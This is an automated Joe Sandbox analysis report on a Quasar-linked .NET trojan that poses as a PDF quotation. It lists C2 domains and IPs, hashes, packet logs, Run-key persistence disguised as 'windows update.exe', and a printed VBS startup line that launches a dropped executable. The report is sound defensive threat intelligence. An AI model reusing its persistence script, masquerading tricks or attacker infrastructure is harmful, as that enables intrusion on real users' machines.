                                                  https://github.com/mgravell/protobuf-neti________.exe, 00000000.00000002.2170154648.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2185351937.00000000066A0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://entityframework-extensions.net/md5-exceptionX________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://stackoverflow.com/q/11564914/23354;________.exe, 00000000.00000002.2170154648.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2191390517.0000000007101000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2185351937.00000000066A0000.00000004.08000000.00040000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3368690490.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://stackoverflow.com/q/2152978/23354________.exe, 00000000.00000002.2170154648.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2185351937.00000000066A0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                        		high
                                                        http://entityframework-plus.net/________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://github.com/npgsql/npgsql/issues/2623#issuecomment-627622215________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://stackoverflow.com/q/2152978/23354sCannot________.exe, 00000000.00000002.2191390517.0000000007101000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3368690490.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ipwho.is/________.exe, 00000000.00000002.2191390517.0000000007101000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2170154648.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3368690490.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3373655788.0000000002A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://dapper-plus.net________.exe, 00000000.00000002.2170154648.0000000003661000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  155.94.209.8
                                                                  		aboushagor.ydns.euUnited States
                                                                  		8100ASN-QUADRANET-GLOBALUStrue
                                                                  185.78.221.73
                                                                  		oleonidas.grGreece
                                                                  		47521IPHOSTGRIpDomainGRfalse

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1559232
                                                                  Start date and time:2024-11-20 10:30:33 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 6m 14s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:8
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:________.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:PRD10219304 drawing and quotation.pdf_____________________________________________________________________________________.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.expl.evad.winEXE@3/3@2/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 50%
                                                                  HCA Information:
                                                                  • Successful, ratio: 96%
                                                                  • Number of executed functions: 187
                                                                  • Number of non-executed functions: 8
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target ________.exe, PID 1812 because it is empty
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: ________.exe

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  04:31:24API Interceptor31x Sleep call for process: ________.exe modified
                                                                  10:31:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
                                                                  10:31:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
                                                                  10:32:01AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  185.78.221.73________.exeGet hashmaliciousQuasarBrowse
                                                                    Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                                                      Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                                                        e-dekont (72).pdf(#U007e56 KB).exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exeGet hashmaliciousDarkCloudBrowse
                                                                            RFQ 4748.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              PurchOrd_75238572.pdf.exeGet hashmaliciousSnake KeyloggerBrowse

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                aboushagor.ydns.eu________.exeGet hashmaliciousQuasarBrowse
                                                                                • 69.174.98.113

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                IPHOSTGRIpDomainGR________.exeGet hashmaliciousQuasarBrowse
                                                                                • 185.78.221.73
                                                                                Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                                                                • 185.78.221.73
                                                                                Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                                                                • 185.78.221.73
                                                                                e-dekont (72).pdf(#U007e56 KB).exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 185.78.221.73
                                                                                DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exeGet hashmaliciousDarkCloudBrowse
                                                                                • 185.78.221.73
                                                                                RFQ 4748.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 185.78.221.73
                                                                                PurchOrd_75238572.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 185.78.221.73
                                                                                433.docx.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                • 185.78.220.138
                                                                                https://ktima-edem.gr/gbzuv/?09812432Get hashmaliciousUnknownBrowse
                                                                                • 93.174.123.195
                                                                                https://andronikidis.gr/3nxw1/?31759481Get hashmaliciousUnknownBrowse
                                                                                • 93.174.123.207
                                                                                ASN-QUADRANET-GLOBALUSPO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                • 66.63.187.231
                                                                                ________.exeGet hashmaliciousQuasarBrowse
                                                                                • 69.174.98.113
                                                                                seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                • 66.63.187.231
                                                                                PO-000041492.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                • 66.63.187.231
                                                                                RFQ541634_A_URGENT_QUOTATION_SHENLE.exeGet hashmaliciousGuLoaderBrowse
                                                                                • 64.188.27.210
                                                                                Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                                                                • 72.11.156.80
                                                                                .main.elfGet hashmaliciousXmrigBrowse
                                                                                • 66.63.187.200
                                                                                mips.elfGet hashmaliciousMiraiBrowse
                                                                                • 104.223.82.201
                                                                                Trykblgens.exeGet hashmaliciousGuLoaderBrowse
                                                                                • 172.93.187.72
                                                                                QUOTATION #46789RFQ_SUPLM_NOV24_SALEH_CONSTRUCTIONS_LLC_PDF.exeGet hashmaliciousRemcos, DarkTortillaBrowse
                                                                                • 66.63.163.134

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                3b5074b1b5d032e5620f69f9f700ff0ePayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 185.78.221.73
                                                                                GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                • 185.78.221.73
                                                                                Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                • 185.78.221.73
                                                                                new order #738833.exeGet hashmaliciousGuLoaderBrowse
                                                                                • 185.78.221.73
                                                                                order and drawings_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 185.78.221.73
                                                                                FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 185.78.221.73
                                                                                114117914 - Rebound Electronics.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 185.78.221.73
                                                                                #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 185.78.221.73
                                                                                BOQ and Full Specification.exeGet hashmaliciousGuLoaderBrowse
                                                                                • 185.78.221.73
                                                                                Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 185.78.221.73

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\________.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):84
                                                                                Entropy (8bit):4.759303574162403
                                                                                Encrypted:false
                                                                                SSDEEP:3:FER/n0eFHHoN+EaKC5fwn:FER/lFHIN7aZ5o
                                                                                MD5:24E325E59A9DA16FD7E496FC15277510
                                                                                SHA1:62488F4BB0B13095340D34D2F168D4AE49256C71
                                                                                SHA-256:D0875FA03294F1132F0556143E503BE569777088E340587A85A23DCBB78841E4
                                                                                SHA-512:840168C3F000FE31719FBF24640B79E768E947329B2D2BF8D45A64788320653F5E6C48258D0B5F665C6D8ED02D70617AD7F99511C1219A89F10E9D00E7DEEA85
                                                                                Malicious:true
                                                                                Reputation:low
                                                                                Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\TypeId.exe"""

                                                                                C:\Users\user\AppData\Roaming\TypeId.exe

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\________.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):1484800
                                                                                Entropy (8bit):5.906247955569718
                                                                                Encrypted:false
                                                                                SSDEEP:12288:+4b/mn3fpox81RRkbicSAHSP4RSchViqtYg7nthaAEOfESKOsrAigAp1g7Yy5Bp4:+JnRkZOgBhaAEoPNY
                                                                                MD5:0A82B8151C26E0CFF39C459FD4E556EF
                                                                                SHA1:FCE0092D63D3CB2C4271E340D6B44069BC3E02D5
                                                                                SHA-256:979EE36A9C72DAB161971310F3B12CB79833838729A69E83D5A5761CFDCDF80F
                                                                                SHA-512:BD1BB3D06874C0AD09BA454040223C32F442DE699E44F79440CF591B57998AE9802FF3191A1E20B8742C52D85B0A61FF05F6F7A1DB074545A297709F1F90EA6A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                Reputation:low
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-.;g................................. ........@.. ....................................`.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H...........$...........$...h............................................0..........(~...*.*.s....(....*.0../.........(....}.......}......|......(...+..|....(....*..(....*..0...........{......9;....(....o.......(....:?.....%.}......}.....|.......(...+.k....{......|............%.}......(....(....s....(....o..............}.....|.....(............}.....|.....(....*........~.......6.|.....(....*...0...........s.......s.... .+..(r...s....(....o.......&.....,F..i...... .3..(r......

                                                                                C:\Users\user\AppData\Roaming\TypeId.exe:Zone.Identifier

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\________.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:modified
                                                                                Size (bytes):26
                                                                                Entropy (8bit):3.95006375643621
                                                                                Encrypted:false
                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                Malicious:true
                                                                                Reputation:high, very likely benign file
                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):5.906247955569718
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                File name:________.exe
                                                                                File size:1'484'800 bytes
                                                                                MD5:0a82b8151c26e0cff39c459fd4e556ef
                                                                                SHA1:fce0092d63d3cb2c4271e340d6b44069bc3e02d5
                                                                                SHA256:979ee36a9c72dab161971310f3b12cb79833838729a69e83d5a5761cfdcdf80f
                                                                                SHA512:bd1bb3d06874c0ad09ba454040223c32f442de699e44f79440cf591b57998ae9802ff3191a1e20b8742c52d85b0a61ff05f6f7a1db074545a297709f1f90ea6a
                                                                                SSDEEP:12288:+4b/mn3fpox81RRkbicSAHSP4RSchViqtYg7nthaAEOfESKOsrAigAp1g7Yy5Bp4:+JnRkZOgBhaAEoPNY
                                                                                TLSH:72651B0532D8B635E6BF4B376EF2481087B3A14297E1EB9A9DC8B9E594837257C0C317
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-.;g................................. ........@.. ....................................`................................

                                                                                File Icon

                                                                                Icon Hash:00928e8e8686b000

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x56bcfe
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x673BE02D [Tue Nov 19 00:47:41 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x16bcb00x4b.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x16c0000x600.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x16e0000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000x169d040x169e00df9ddb61269421426b252ad96c650fb1False0.3339074643782383data5.909148032108176IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x16c0000x6000x600ce54c7f96b71d87970942e24940d31a3False0.4127604166666667data4.071424914961794IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x16e0000xc0x20013381accc4c46e47ac70a75391dcf053False0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_VERSION0x16c0a00x30cdata0.42435897435897435
                                                                                RT_MANIFEST0x16c3ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                Imports

                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain

                                                                                Network Behavior

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 20, 2024 10:31:25.419506073 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:25.419562101 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:25.419634104 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:25.434720039 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:25.434767008 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.164030075 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.164113998 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.172411919 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.172444105 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.172744036 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.222229004 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.233439922 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.275336027 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.543303967 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.543339968 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.543349028 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.543409109 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.543437958 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.597273111 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.670397043 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.670413971 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.670442104 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.670536041 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.670583010 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.680385113 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.680401087 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.680504084 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.685486078 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.685503006 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.685578108 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.696924925 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.696938992 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.697024107 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.931323051 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.931339025 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.931397915 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.932717085 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.932728052 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.932779074 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.934228897 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.934288025 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.935679913 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.935753107 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.937135935 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.937206030 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.938750029 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.938812017 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.941135883 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.941214085 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:26.942600965 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:26.942673922 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:27.066171885 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:27.066256046 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:27.067406893 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:27.067471027 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:27.068331003 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:27.068392038 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:27.070422888 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:27.070486069 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:27.071490049 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:27.071558952 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:27.073580027 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:27.073647976 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:27.074421883 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:27.074479103 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:27.076107025 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:27.076164961 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:27.076975107 CET44349709185.78.221.73192.168.2.6
                                                                                Nov 20, 2024 10:31:27.077029943 CET49709443192.168.2.6185.78.221.73
                                                                                Nov 20, 2024 10:31:27.078609943 CET44349709185.78.221.73192.168.2.6
